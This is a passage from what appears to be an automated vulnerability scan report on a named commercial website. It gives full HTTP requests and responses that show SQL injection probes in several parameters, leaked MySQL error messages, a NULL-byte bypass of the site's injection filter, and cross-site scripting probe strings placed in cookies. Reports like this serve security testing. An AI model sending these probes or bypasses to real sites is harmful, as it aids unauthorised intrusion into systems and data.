X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.270. http://www.insideup.com/ppc/leadflow/dima00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7366
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:16:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.271. http://www.insideup.com/ppc/leadflow/dima00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7366
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:18:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.272. http://www.insideup.com/ppc/leadflow/dima00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa%00'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o83jipv4fummophv83sd4bf5f0; path=/
Content-Length: 7550
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ampaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a.'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=cast((select ' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa%00''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4vq9pao5umgkmqp5nntsrl0jb7; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.273. http://www.insideup.com/ppc/leadflow/dima00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6614
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/dima00/project.php?catId=80006&iusrc=-1 OR 17-7=10&address=Address&attr' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.274. http://www.insideup.com/ppc/leadflow/dima00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:32:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=01r8nitdq372emgnq0eggtseq5; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow'/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80006&group=dima00&template=3' OR prj.project_page_url = 'leadflow'/dima0' at line 5

Request 2

GET /ppc/leadflow''/dima00/project_dynamic_page_updated.php?catId=80006&group=dima00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
